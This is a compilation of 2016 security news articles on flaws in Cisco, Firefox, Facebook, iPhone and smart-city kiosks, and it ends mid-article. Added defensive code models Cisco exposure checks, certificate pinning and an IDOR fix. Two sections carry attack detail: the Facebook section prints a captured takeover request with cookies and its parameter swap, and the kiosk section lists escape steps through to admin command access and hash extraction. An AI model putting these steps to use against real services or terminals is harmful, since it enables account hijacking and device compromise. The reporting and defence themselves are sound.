“This vulnerability can only be exploited by IKEv1 traffic being processed by a device configured for IKEv1. Transit IKEv1 traffic can not trigger this vulnerability. IKEv2 is not affected,” Cisco said. “Spoofing of packets that could exploit this vulnerability is limited because the attacker needs to either receive or have access to the initial response from the vulnerable device.”
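A triage helper for the two Cisco articles on this page (this one and "Cisco finds new Zero-Day Exploit linked to NSA Hackers"), added here as an example and not a Cisco tool: it flags the running-config lines that make an IOS device accept IKEv1 negotiation requests, lists UDP 500/4500 listeners from `show udp` output, and applies the affected-version ranges the advisory gives for IOS XR and PIX. The sample configuration, the `show udp` column layout and the hostnames and addresses are constructed; the advisory's own IoCs and IPS signatures remain the authoritative check.

```python
"""CVE-2016-6415 exposure triage from Cisco configuration text (constructed example)."""
import re

# IOS XR trains the advisory lists as affected; 5.3.0 and later are not.
AFFECTED_XR_TRAINS = ("4.3.", "5.0.", "5.1.", "5.2.")
IKE_PORTS = {500, 4500}   # ISAKMP and NAT-T; only traffic addressed to the device counts

# Lines that make a device accept IKEv1 security negotiation requests
# (IOS / IOS XE syntax; the last pattern covers the PIX 6.x "isakmp ..." commands).
IKEV1_MARKERS = (
    re.compile(r"^crypto isakmp policy \d+", re.M),
    re.compile(r"^crypto isakmp key \S+ (?:address|hostname) \S+", re.M),
    re.compile(r"^crypto isakmp profile \S+", re.M),
    re.compile(r"^crypto map \S+ \d+ ipsec-isakmp", re.M),
    re.compile(r"^isakmp (?:enable|policy|key) .+", re.M),
)

# Constructed running-config excerpt of a router terminating a site-to-site IPsec tunnel.
SAMPLE_CONFIG = """\
hostname edge-rtr
crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 2
crypto isakmp key s3cret address 203.0.113.10
crypto ipsec transform-set TS esp-aes esp-sha-hmac
crypto map VPNMAP 10 ipsec-isakmp
 set peer 203.0.113.10
 set transform-set TS
 match address 101
interface GigabitEthernet0/0
 crypto map VPNMAP
"""

# Constructed `show udp` excerpt; assumed columns: Proto Remote Port Local Port ...
SAMPLE_SHOW_UDP = """\
Proto    Remote      Port      Local       Port  In Out Stat TTY OutputIF
 17 0.0.0.0             0 192.0.2.1          123   0   0    1   0
 17 0.0.0.0             0 192.0.2.1          500   0   0    1   0
 17 0.0.0.0             0 192.0.2.1         4500   0   0    1   0
"""


def ikev1_config_lines(running_config: str) -> list:
    """Return the configuration lines that enable IKEv1 processing."""
    return [m.group(0) for rx in IKEV1_MARKERS for m in rx.finditer(running_config)]


def ike_listeners(show_udp: str) -> set:
    """Local UDP ports from `show udp` that are IKE ports (assumed column layout)."""
    found = set()
    for line in show_udp.splitlines():
        cols = line.split()
        if len(cols) >= 5 and cols[0] == "17" and cols[4].isdigit() and int(cols[4]) in IKE_PORTS:
            found.add(int(cols[4]))
    return found


def version_affected(platform: str, version: str) -> bool:
    """Ranges from the advisory: IOS XR 4.3.x-5.2.x; PIX 6.x and earlier; all IOS XE releases.
    IOS needs a per-release lookup, so it is treated as affected until checked."""
    if platform == "IOS-XR":
        return version.startswith(AFFECTED_XR_TRAINS)
    if platform == "PIX":
        return int(version.split(".")[0]) < 7
    return True


def assess(platform: str, version: str, running_config: str, show_udp: str = "") -> dict:
    """Exposed only if the software is affected AND the device actually processes IKEv1."""
    cfg = ikev1_config_lines(running_config)
    ports = ike_listeners(show_udp)
    affected = version_affected(platform, version)
    return {"software_affected": affected,
            "ikev1_config": cfg,
            "ike_listeners": sorted(ports),
            "exposed": affected and bool(cfg or ports)}
```

Because only IKEv1 packets addressed to the device can trigger the flaw, and the attacker needs to see the device's response, an infrastructure ACL that limits UDP 500/4500 to known peers narrows the exposure while the patch is pending; it is not a fix, and IKEv2-only deployments are not affected at all.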

NIST issues the Baldrige Cybersecurity Excellence Builder cybersecurity self-assessment tool
19.9.2016 securityaffairs Security
The National Institute of Standards and Technology (NIST) has issued a draft of a self-assessment tool named the Baldrige Cybersecurity Excellence Builder.
The tool is based on the Baldrige Performance Excellence Program and on the risk-management approach of the NIST Cybersecurity Framework.

The Baldrige Cybersecurity Excellence Builder was designed to help enterprises measure the effectiveness of their implementation of the Cybersecurity Framework and improve their risk management.

“The builder will strengthen the already powerful cybersecurity framework so that organizations can better manage their cybersecurity risks,” said Commerce Deputy Secretary Bruce Andrews, who presented the tool at an Internet Security Alliance conference.

The draft of the Baldrige Cybersecurity Excellence Builder is the result of a collaboration between NIST and the Office of Management and Budget's Office of Electronic Government and Information Technology, with input from private-sector representatives.

The tool was devised to help organizations ensure that their cybersecurity program (systems and processes) supports their activities and functions.

“These decisions around cybersecurity are going to impact your organization and what it does and how it does it,” says Robert Fangmeyer, director of the Baldrige Performance Excellence Program. “If your cybersecurity operations and approaches aren’t integrated into your larger strategy, aren’t integrated into your workforce development efforts, aren’t integrated into the results of the things you track for your organization and overall performance, then they’re not likely to be effective.”

NIST explained that using the Baldrige Cybersecurity Excellence Builder allows organizations of any size and type to:

Identify cybersecurity-related activities that are critical to business strategy and the delivery of critical services;
Prioritize investments in managing cybersecurity risk;
Assess the effectiveness and efficiency in using cybersecurity standards, guidelines and practices;
Evaluate their cybersecurity results; and
Identify priorities for improvement.
The Builder guides users through a process that details their organization’s distinctive characteristics and strategic situations related to cybersecurity. Then, a series of questions helps define the organization’s current approaches to cybersecurity in the areas of leadership, strategy, customers, workforce and operations, as well as the results achieved with them.

The approach behind the Builder is simple: a series of questions helps organizations assess their strategies tied to cybersecurity. The areas assessed by the questionnaire are leadership, strategy, customers, workforce, and operations.

As the last step of the assessment, a rubric lets users evaluate the cybersecurity maturity level of their organization.

“The tool’s assessment rubric helps users determine whether their organization’s cybersecurity maturity level is reactive, early, mature or a role model, according to NIST. The completed evaluation can lead to an action plan for upgrading cybersecurity practices and management and implementing those improvements.” reads the announcement published by the NIST. “It also can measure the progress and effectiveness of the process. NIST recommends organizations use the builder periodically so they can maintain the highest level of cybersecurity readiness.”

Hacking industrial processes with an undetectable PLC rootkit
19.9.2016 securityaffairs Virus

Two security researchers have developed an undetectable PLC rootkit that they will present at the upcoming Black Hat Europe 2016.
The energy industry is under unceasing attack; cyber criminals and state-sponsored hackers continue to target the systems of companies in the sector.
The Stuxnet case demonstrated to the IT community the danger of cyber attacks in which threat actors spread malicious code to interfere with processes inside a critical infrastructure.
A new attack to be revealed at the Black Hat Europe conference silently takes over industrial network processes.
Ali Abbasi, a Ph.D. candidate in the Distributed and Embedded System Security group at the University of Twente, Netherlands, and Majid Hashemi, an independent security researcher, have developed an undetectable PLC rootkit, which they will present at Black Hat Europe in London in November.

The duo will also present a version of the PLC attack that relies on shellcode. The title of the presentation is "Ghost In The PLC: Designing An Undetectable Programmable Logic Controller Rootkit".

The researchers believe their PLC rootkit could be more dangerous than Stuxnet because it is stealthy and attacks the PLC directly, whereas Stuxnet reached the PLC through the Windows-based engineering and SCADA systems. Sitting at a lower level of the system, it is much less likely to be discovered.

The PLC rootkit targets the low-level components of a PLC; it can be considered a cross-platform PLC threat because it can infect PLCs from almost any vendor.

“It’s a race to the bottom” Abbasi told DarkReading. “Everybody has access to higher-level [SCADA operations]. Attackers in the future will go to lower level assaults” such as this to evade detection, he says.

Attacking a PLC directly can be simpler for malware authors because such devices implement few detection mechanisms, which means a PLC running a real-time operating system can be more exposed to attack.

In August, a group of researcher presented at the Black Hat USA presented a PLC worm that spreads among PLCs, it was dubbed by the creator PLC-Blaster.

Abbasi and Hashemi explained their PLC rootkit doesn’t target the PLC logic code like other similar threats making hard its detection.

Furthermore, the researchers explained that the activity of the PLC rootkit will go unnoticed even to systems that monitor the power consumption of the PLC.

“The overhead imposed of our attack outside of kernel is below one percent, which means even those approaches which monitor the power usage of PLC for attack detection will be useless,” explained Abbasi.

The malware interferes with the connection between the PLC runtime and logic and the I/O peripherals. It resides in the dynamic memory of the industrial component and manipulates the I/O and the PLC process while the PLC is communicating with the I/O block, which is composed of output pins that handle the physical control of the process.

The PLC receives signals from the field through its input pins (e.g. the level of liquid in a pipe) and controls the process through actuators that receive instructions from the PLC’s output pins (e.g. the control of a valve).

Clearly, by manipulating the I/O signals it is possible to interfere with the industrial process in a stealthy way, and this is what the PLC rootkit does.

“Our attack instead targets the relation between PLC runtime and logic with the I/O peripherals of it. In our attack, the PLC logic and PLC runtime remain intact,” said Abbasi. “In PLCs, the I/O operations are one of the most important tasks.”

As explained by the duo, the attack is feasible due to the lack of hardware interrupts on the PLC’s SoC, and is made worse by the pin control subsystem’s inability to detect pin configuration changes at the hardware level.

Abbasi and Hashemi are currently studying defensive countermeasures to detect and protect PLCs from such threats.

Mozilla will fix the cross-platform RCE flaw that threatened Tor anonymity
18.9.2016 securityaffairs Vulnerability

Mozilla plans to fix the cross-platform RCE flaw that threatened Tor anonymity. The flaw affects certificate pinning protections implemented by Mozilla.
Mozilla plans to release a Firefox update to address the cross-platform remote code-execution vulnerability recently patched in the Tor browser.

The Tor Project is urging its users to install the security update immediately, and Mozilla will follow as soon as possible.

Mozilla will release the fix next Tuesday. The flaw could be exploited by attackers to launch a man-in-the-middle attack, impersonating Mozilla servers through a forged certificate.

According to the Tor Project, once an attacker is in a position to launch a MitM attack and is able to forge a single TLS certificate for addons.mozilla.org, he could inject into the traffic a malicious update for NoScript or many other Firefox extensions installed on a targeted computer.

“I spent a decent portion of my day looking into the claim by the Tor-Fork developer that you could get cross-platform RCE on Tor Browser if you’re able to both MitM a connection and forge a single TLS certificate for addons.mozilla.org. This is well within the capability of any decently resourced nation-state.” wrote the researcher Ryan Duff.

The fake certificate would have to be issued by one of the many certificate authorities (CAs) trusted by Firefox.

Such an attack is not easy to carry out for a common attacker, who would need to be able to forge a certificate for addons.mozilla.org.

Anyway, there is a concrete risk that a nation-state actor or a persistent attacker could exploit the vulnerability to launch an attack and eavesdrop on protected traffic or de-anonymize Tor users.

Persistent attackers could target a CA with the specific intent of forging counterfeit digital certificates. In 2011, hackers allegedly linked to the Iranian Government hacked the Dutch CA DigiNotar and issued forged certificates for more than a hundred domains, including the Mozilla add-ons subdomain.

The security researcher Ryan Duff explained that production versions of Firefox are affected by the flaw, while a nightly build released on September 4 is not vulnerable.

“Firefox uses its own static key pinning method for its own Mozilla certs instead of using HPKP. The enforcement of the static method appears to be much weaker than the HPKP method and is flawed to the point that it is bypassable in this attack scenario. The bug appears to be fixed as of the September 4th nightly build of Firefox but is obviously still unpatched in both the current production versions of Firefox and Tor Browser.” added Duff.

Duff analyzed the cross-platform RCE and reproduced the hack described by the researcher @movrcx, who describes himself as an “anti-torcorp insurgent.” @movrcx explained in his analysis, titled “Tor Browser Exposed: Anti-Privacy Implantation at Mass Scale”, that the “certificate pinning” mechanism implemented by Firefox was ineffective against the attack described in that post.

Duff highlighted that the problem is related to the implementation of static key pinning that is not based on the HTTP Public Key Pinning (HPKP) protocol.

“We investigated this and a fix will be issued in the next Firefox release on Tuesday, September 20. We had fixed an issue with the broken automation on the Developer Edition on September 4, but a certificate pinning had expired for users of our Release and Extended Support Release versions.” reads a statement issued by Mozilla. “We will be turning on HPKP on the addons.mozilla.org server itself so that users will remain protected once they have visited the site even if the built-in pins expire. We will be changing our internal processes so built-in certificate pins do not expire prematurely in future releases.”

Until the update is available, users should consider disabling automatic extension updates.
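The two pinning mechanisms the article contrasts can be modelled in a few lines. The following is an added example, not code from Firefox or from Mozilla: it shows how an expired built-in pin set silently stops protecting a host (the forged chain is classified as “unpinned” rather than rejected), and how an HPKP pin set cached from an earlier visit still catches the forged chain. The SPKI byte strings and pin values are constructed placeholders, not real Mozilla or CA key material.

```python
import base64
import hashlib
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


def spki_pin(spki_der: bytes) -> str:
    """A pin is the base64 SHA-256 digest of a certificate's SubjectPublicKeyInfo
    (DER), the format used by both Firefox's built-in pin list and HPKP (RFC 7469)."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode("ascii")


@dataclass
class PinSet:
    host: str
    pins: frozenset      # acceptable SPKI pins anywhere in the chain
    expires: datetime    # built-in pins ship with an expiry; HPKP pins get now + max-age


def parse_hpkp(host: str, header: str, now: datetime):
    """Turn a Public-Key-Pins header into a PinSet, or None if it must be ignored.

    RFC 7469 requires at least two pins (one being a backup key not in the
    served chain) and a max-age directive; a header lacking either is dropped.
    """
    pins = frozenset(re.findall(r'pin-sha256="([^"]+)"', header))
    max_age = re.search(r"max-age=(\d+)", header)
    if len(pins) < 2 or max_age is None:
        return None
    return PinSet(host, pins, now + timedelta(seconds=int(max_age.group(1))))


def check_chain(host, chain_spkis, static_pins, hpkp_cache, now):
    """Classify a presented TLS chain (list of DER SPKIs, leaf first) for host.

    Returns "ok" when an unexpired pin set matches some key in the chain,
    "pin_mismatch" when an unexpired pin set exists and nothing matches, and
    "unpinned" when no unexpired pin set covers the host at all. "unpinned" is
    the window the article describes: an expired built-in pin set is skipped,
    so a chain from any trusted CA passes without a pin check.
    """
    chain_pins = {spki_pin(spki) for spki in chain_spkis}
    candidates = [p for p in (static_pins.get(host), hpkp_cache.get(host))
                  if p is not None and p.expires > now]
    if not candidates:
        return "unpinned"
    for pinset in candidates:
        if chain_pins & pinset.pins:
            return "ok"
    return "pin_mismatch"


def addons_scenario():
    """Replays the situation described for addons.mozilla.org with constructed keys."""
    now = datetime(2016, 9, 17, tzinfo=timezone.utc)
    host = "addons.mozilla.org"
    real_key = b"constructed-spki-of-the-genuine-addons-key"
    backup_key = b"constructed-spki-of-the-backup-key"
    forged_chain = [b"constructed-spki-of-a-mis-issued-cert",
                    b"constructed-spki-of-the-issuing-ca"]
    # Built-in pin set whose expiry has already passed, as in the Release builds.
    static_pins = {host: PinSet(host, frozenset({spki_pin(real_key), spki_pin(backup_key)}),
                                expires=datetime(2016, 9, 10, tzinfo=timezone.utc))}
    before = check_chain(host, forged_chain, static_pins, {}, now)
    # Mozilla's remedy: HPKP served by the site itself, cached on a visit the day before.
    header = ('pin-sha256="%s"; pin-sha256="%s"; max-age=5184000; includeSubDomains'
              % (spki_pin(real_key), spki_pin(backup_key)))
    hpkp_cache = {host: parse_hpkp(host, header, now - timedelta(days=1))}
    after = check_chain(host, forged_chain, static_pins, hpkp_cache, now)
    genuine = check_chain(host, [real_key], static_pins, hpkp_cache, now)
    return before, after, genuine
```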

GCHQ plans to protect the country with a national firewall
18.9.2016 securityaffairs Security

The British intelligence agency GCHQ is planning to protect the country from cyber attacks by creating a national firewall.
The news was announced by Ciaran Martin, GCHQ director general of cyber security, during the Billington CyberSecurity Summit held in Washington DC.

GCHQ recently created the National Cyber Security Centre (NCSC), led by Martin, which is tasked with protecting national infrastructure from attacks originating on the Internet.

“The NCSC will be based in London and will open in October. Ciaran Martin, currently Director General Cyber at GCHQ will lead it. Dr Ian Levy, currently Technical Director of Cyber Security at GCHQ, will join the organisation as Technical Director.” reads a press release issued by the UK Government.

“The UK faces a growing threat of cyber-attacks from states, serious crime gangs, hacking groups as well as terrorists. The NCSC will help ensure that the people, public and private sector organisations and the critical national infrastructure of the UK are safer online.”

In March 2016, the then Minister for the Cabinet Office, Matt Hancock, highlighted the importance of the Centre.

“It will be the authoritative voice on information security in the UK and one of its first tasks will be to work with the Bank of England to produce advice for the financial sector for managing cyber security effectively.” said Hancock.

Martin used the term “flagship project” while describing GCHQ’s plans for the national firewall. The infrastructure will protect government websites and national security agencies from hackers.

The national firewall would be used by government agencies and internet service providers to repel cyber threats.

“What better way of providing automated defences at scale than by the major private providers effectively blocking their customers from coming into contact with known malware and bad addresses?” Martin said during his speech.

The National Cyber Security Centre will start its activities next month; it represents one of the pillars of the UK Government’s cyber strategy, as announced last year by the former Chancellor Mr Osborne.

Osborne also announced the plans of the Government to almost double the cybersecurity budget to £1.9 billion for the years 2016 – 2021.

The UK Government will also add 1,900 new professionals to the national intelligence agencies.

“In the Spending Review, I have made a provision to almost double our investment to protect Britain from cyber attack and develop our sovereign capabilities in cyberspace, totalling £1.9 billion over five years. If you add the spending on core cyber security capabilities government protecting our own networks and ensuring safe and secure online services, the government’s total cyber spending will be more than £3.2 billion.” said Osborne.

Cyber security is crucial for any government. The number of “national security level cyber incidents” has almost doubled in the last year; the agency now detects about 200 serious incidents every month aimed at disrupting national infrastructure and services.

Cyber attacks are asymmetric and instantaneous, and difficult to repel without the aid of a new generation of tools.

The National Cyber Security Centre also has plans to design a new generation of automated defense systems to neutralise a large number of attacks having a low level of sophistication, such as phishing attacks spoofing government email addresses to target members of the public.

“We trialled it, and whoever was sending 58,000 malicious emails per day from taxrefund@gov.uk isn’t doing it anymore,” added Martin.

Hacking Facebook pages? Hackers demonstrated how to do it in 10 secs
18.9.2016 securityaffairs Hacking

Hacking Facebook – An Indian researcher discovered a critical vulnerability in the Facebook business manager that could be exploited to hack any Page.
The Indian security researcher Arun Sureshkumar reported a critical vulnerability in the Facebook business manager that could be exploited by attackers to hack any Facebook page.

The Business Manager is the component that allows businesses to share and control access to assets on Facebook, including Pages and Ad accounts.

Facebook Business Manager also allows administrators to share access to Pages and ad accounts without being friends with coworkers on Facebook.

Before analyzing the technique devised by the researcher, let me introduce the concept of Insecure Direct Object Reference (IDOR).

According to the definition provided by the OWASP project, Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, an attacker can bypass authorization and access resources in the system directly.

“Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.” reads the OWASP definition.

Sureshkumar exploited an IDOR vulnerability in the Facebook Business Manager that allowed him to take over any Facebook page in less than 10 seconds.

Sureshkumar used his Facebook business account (ID 907970555981524) to add a partner. As the partner he used a test account with ID 991079870975788.

The researcher used Burp Suite to capture the request, which allowed him to modify it.

Below is the request the researcher published in a blog post:

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

What about hacking Facebook? How?

He replaced the ‘asset_id’ value with that of the target page, swapped the ‘parent_business_id’ and ‘agency_id’ values, and changed the role value to ‘MANAGER’:

parent_business_id=991079870975788
agency_id=907970555981524
asset_id=190313461381022

With this simple trick, Sureshkumar obtained admin rights on the target business page, demonstrating that hijacking Facebook Pages was possible.
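The root cause is an authorization check that trusts the identifiers in the request body. The following is an added example (not Facebook’s code, and the ids and data store are constructed placeholders): a handler that exhibits the IDOR pattern next to one that validates each identifier against the server’s own ownership records, replayed with the swap described above.

```python
from dataclasses import dataclass, field

ALLOWED_ROLES = {"ADVERTISER", "ANALYST", "MANAGER"}


@dataclass
class Business:
    id: int
    admins: set                                # user ids who administer this business
    pages: set = field(default_factory=set)    # page ids this business owns


@dataclass
class Store:
    businesses: dict                           # business id -> Business
    # (page_id, agency_business_id) -> role granted to the agency on that page
    page_access: dict = field(default_factory=dict)


def share_asset_vulnerable(store, user_id, parent_business_id, agency_id, asset_id, role):
    """IDOR pattern: the handler trusts every identifier in the form body.

    It only confirms that a user is logged in and then writes the grant the
    client asked for, so any authenticated user can point asset_id at any page
    and agency_id at a business they control.
    """
    if not user_id:
        return False
    store.page_access[(asset_id, agency_id)] = role
    return True


def share_asset_fixed(store, user_id, parent_business_id, agency_id, asset_id, role):
    """Authorize against server-side ownership, not the request's identifiers.

    - the caller must administer parent_business_id;
    - asset_id must be a page owned by parent_business_id;
    - agency_id must be an existing business;
    - role must be a recognised value.
    """
    parent = store.businesses.get(parent_business_id)
    if parent is None or user_id not in parent.admins:
        return False
    if asset_id not in parent.pages:
        return False
    if agency_id not in store.businesses:
        return False
    if role not in ALLOWED_ROLES:
        return False
    store.page_access[(asset_id, agency_id)] = role
    return True


def build_store():
    # Constructed data: user 1 runs business 1001, which owns page 7001;
    # user 2 runs business 2002 and has no relation to that page.
    victim_biz = Business(id=1001, admins={1}, pages={7001})
    attacker_biz = Business(id=2002, admins={2})
    return Store(businesses={victim_biz.id: victim_biz, attacker_biz.id: attacker_biz})


def replay_takeover(handler):
    """User 2 names a business they control as parent and agency and points
    asset_id at the victim's page, asking for MANAGER. Returns (granted, role)."""
    store = build_store()
    granted = handler(store, user_id=2, parent_business_id=2002, agency_id=2002,
                      asset_id=7001, role="MANAGER")
    return granted, store.page_access.get((7001, 2002))


def legitimate_share(handler):
    """The intended flow: the page owner's admin grants an agency access."""
    store = build_store()
    granted = handler(store, user_id=1, parent_business_id=1001, agency_id=2002,
                      asset_id=7001, role="MANAGER")
    return granted, store.page_access.get((7001, 2002))
```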

Sureshkumar also published a video PoC of the attack.

The security expert reported the flaw to Facebook on August 29, 2016. Facebook investigated the problem and also discovered another flaw in its platform.

The social network giant awarded Sureshkumar 16,000 USD under its bug bounty program.


Instead of spending $1.3 million, FBI could have Hacked iPhone in just $100
17.9.2016 thehackernews Apple
Do you remember the infamous encryption fight between the FBI and Apple over unlocking an iPhone 5C belonging to a terrorist?
Yes, you got it right, the same Apple vs. FBI case in which the FBI paid almost $1.3 Million to a group of hackers to unlock that iPhone.
However, if the agency had shown some patience and explored more ways to get into that iPhone, it might have cost them as little as US$100.
Yes, you heard that right. Now anyone can unlock an iPhone for less than $100, for which the FBI paid more than $1 million.
Cheap Method to Unlock iPhone 5C
Cambridge University security researcher Sergei Skorobogatov has published a new research paper detailing a technique that would have helped the FBI bypass the iOS passcode limit on the shooter's iPhone 5C.
Dubbed NAND Mirroring, the technique was proposed to the FBI earlier this year, but the agency claimed that the method would not work. "It does not work," FBI Director James Comey said back in March, and instead paid a hefty amount to a contractor.
In his research paper published on Thursday, Skorobogatov says that the FBI was not only wrong in its assessment of NAND Mirroring, but also spent $1 million of taxpayers' money on a case that could have been solved for a few hundred dollars.
Here's How the Researcher Unlocked iPhone 5C:
NAND Mirroring technique "does not require any expensive and sophisticated equipment. All needed parts are low cost and were obtained from local electronics distributors," writes Skorobogatov.
During his test, Skorobogatov used store-bought equipment, stripped down an iPhone 5C running iOS 9.3, carefully removed the NAND memory chip from the phone’s circuit board, and copied its data to a special test board many times over.
The researcher then used automated software to brute-force the passcode until he found the correct code; he said it takes around 20 hours to brute-force a four-digit passcode, and a few weeks for a six-digit one.
"This is the first public demonstration of…the real hardware mirroring process for iPhone 5C," Skorobogatov writes. "Any attacker with sufficient technical skills could repeat the experiments."
So far, the FBI and Apple have not commented on Skorobogatov's research.
The Method Works on iPhone 5S and iPhone 6 Devices
Besides the iPhone 5C, his attack also works on iPhone 5S and iPhone 6 devices using the same type of NAND Flash memory. The attack can also be adapted to other iPhones using different NANDs.
For more technical details about this technique to bypass the iPhone's passcode limit, refer to his research paper.
You can also watch the video demonstration, where Skorobogatov explained the NAND Mirroring technique.

Fooling the ‘Smart City’
17.9.2016 Kaspersky  Security
The concept of a smart city involves bringing together various modern technologies and solutions that can ensure comfortable and convenient provision of services to people, public safety, efficient consumption of resources, etc. However, something that often goes under the radar of enthusiasts championing the smart city concept is the security of smart city components themselves. The truth is that a smart city’s infrastructure develops faster than security tools do, leaving ample room for the activities of both curious researchers and cybercriminals.

Smart Terminals Have Their Weak Points Too

Parking payment terminals, bicycle rental spots and mobile device recharge stations are abundant in the parks and streets of modern cities. At airports and passenger stations, there are self-service ticket machines and information kiosks. In movie theaters, there are ticket sale terminals. In clinics and public offices, there are queue management terminals. Even some paid public toilets now have payment terminals built into them, though not very often.

Ticket terminals in a movie theater

However, the more sophisticated the device, the higher the probability that it has vulnerabilities and/or configuration flaws. The probability that smart city component devices will one day be targeted by cybercriminals is far from zero. Cybercriminals can potentially exploit these devices for their own purposes, and the scenarios for such exploitation follow from the characteristics of these devices:

Many such devices are installed in public places
They are available 24/7
They have the same configuration across devices of the same type
They have a high user trust level
They process user data, including personal and financial information
They are connected to each other, and may have access to other local area networks
They typically have an Internet connection

Increasingly often, we see news on another electronic road sign getting hacked and displaying a “Zombies ahead” or similar message, or news about vulnerabilities detected in traffic light management or traffic control systems. However, this is just the tip of the iceberg; smart city infrastructure is not limited to traffic lights and road signs.

We decided to analyze some smart city components:

Touch-screen payment kiosks (tickets, parking etc.)
Infotainment terminals in taxis
Information terminals at airports and railway terminals
Road infrastructure components: speed cameras, traffic routers

Smart City Terminals

From a technical standpoint, nearly all payment and service terminals – irrespective of their purpose – are ordinary PCs equipped with touch screens. The main difference is that they have a ‘kiosk’ mode – an interactive graphical shell that blocks the user from accessing the regular operating system functions, leaving only a limited set of features that are needed to perform the terminal’s functions. But this is theory. In practice, as our field research has shown, most terminals do not have reliable protection preventing the user from exiting the kiosk mode and gaining access to the operating system’s functions.

Exiting the kiosk mode

Techniques for Exiting the Kiosk Mode

There are several types of vulnerabilities that affect a large proportion of terminals. As a consequence, there are existing attack methods that target them.

The sequence of operations that can enable an attacker to exit the full-screen application is illustrated in the picture below.

Methodology for analyzing the security of public terminals

Tap Fuzzing

The tap fuzzing technique involves trying to exit the full-screen application by taking advantage of incorrect handling when interacting with the full-screen application. A hacker taps screen corners with his fingers and tries to call the context menu by long-pressing various elements of the screen. If he is able to find such weak points, he tries to call one of the standard OS menus (printing, help, object properties, etc.) and gain access to the on-screen keyboard. If successful, the hacker gets access to the command line, which enables him to do whatever he wants in the system – explore the terminal’s hard drive in search of valuable data, access the Internet or install unwanted applications, such as malware.

Data Fuzzing

Data fuzzing is a technique that, if exploited successfully, also gives an attacker access to the “hidden” standard OS elements, but by using a different technique. To exit the full-screen application, the hacker tries filling in available data entry fields with various data in order to make the ‘kiosk’ work incorrectly. This can work, for example, if the full-screen application’s developer did not configure the filter checking the data entered by the user properly (string length, use of special symbols, etc.). As a result, the attacker can enter incorrect data, triggering an unhandled exception: as a result of the error, the OS will display a window notifying the user of the problem.

Once an element of the operating system’s standard interface has been brought up, the attacker can access the control panel, e.g., via the help section. The control panel will be the starting point for launching the virtual keyboard.

Other Techniques

Yet another technique for exiting the ‘kiosk’ is to search for external links that might enable the attacker to access a search engine site and then other sites. Due to developer oversight, many full-screen applications used in terminals contain links to external resources or social networks, such as VKontakte, Facebook, Google+, etc. We have found external links in the interface of cinema ticket vending machines and bike rental terminals, described below.

One more scenario of exiting the full-screen application is using standard elements of the operating system’s user interface. When using an available dialog window in a Windows-based terminal, an attacker is sometimes able to call the dialog window’s control elements, which enables him to exit the virtual ‘kiosk’.

Exiting the full-screen application of a cinema ticket vending terminal

Bike Rental Terminals

Cities in some countries, including Norway, Russia and the United States, are dotted with bicycle rental terminals. Such terminals have touch-screen displays that people can use to register if they want to rent a bike or get help information.

Status bar containing a URL

We found that the terminal system shown above has a curious feature. The Maps section was implemented using Google maps, and the Google widget includes a status bar, which contains “Report an Error”, “Privacy Policy” and “Terms of Use” links, among other information. Tapping on any of these links brings up a standard Internet Explorer window, which provides access to the operating system’s user interface.

The application includes other links, as well: for example, when viewing some locations on the map, you can tap on the “More Info” button and open a web page in the browser.

Internet Explorer opens not only a web page, but also a new opportunity for the attacker

It turned out that calling up the virtual keyboard is not difficult either. By tapping on links on help pages, an attacker can access the Accessibility section, which is where the virtual keyboard can be found. This configuration flaw enables attackers to execute applications not needed for the device’s operation.

Running cmd.exe demonstrates yet another critical configuration flaw: the operating system’s current session is running with administrator privileges, which means that an attacker can easily execute any application.

The current Windows session is running with administrator privileges

In addition, an attacker can get the NTLM hash of the administrator password. It is highly probable that the password used on this device will work for other devices of the same type, as well.

Note that, in this case, an attacker can not only obtain the NTLM hash – which has to be brute-force cracked to get the password – but the administrator password itself, because passwords can be extracted from memory in plain text.

An attacker can also make a dump of the application that collects information on people who wish to rent a bicycle, including their full names, email addresses and phone numbers. It is not impossible that the database hosting this information is stored somewhere nearby. Such a database would have an especially high market value, since it contains verified email addresses and phone numbers. If it cannot be obtained, an attacker can install a keylogger that will intercept all data entered by users and send it to a remote server.

Given that these devices work 24/7, they can be pooled together to mine cryptocurrency or used for other malicious purposes, since an infected workstation will be online around the clock.

Particularly audacious cybercriminals can implement an attack scenario that will enable them to get customer payment data by adding a payment card detail entry form to the main window of the bike rental application. It is highly probable that users deceived by the cybercriminals will enter this information alongside their names, phone numbers and email addresses.

Terminals at Government Offices

Terminals at some government offices can also be easily compromised by attackers. For example, we have found a terminal that prints payment slips based on the data entered by users. After all fields have been filled with the relevant data, the user taps the “Create” button, after which the terminal opens a standard print window with all the print parameters and control tools for several seconds. Next, the “Print” button is automatically activated.

A detail of the printing process on one of the terminals

An attacker has several seconds to tap the Change [printer] button and exit into the help section. From there, they can open the control panel and launch the on-screen keyboard. As a result, the attacker gets all the devices needed to enter information (the keyboard and the mouse pointer) and can use the computer for their own mercenary purposes, e.g., launch malware, get information on printed files, obtain the device’s administrator password, etc.

Public Devices at Airports

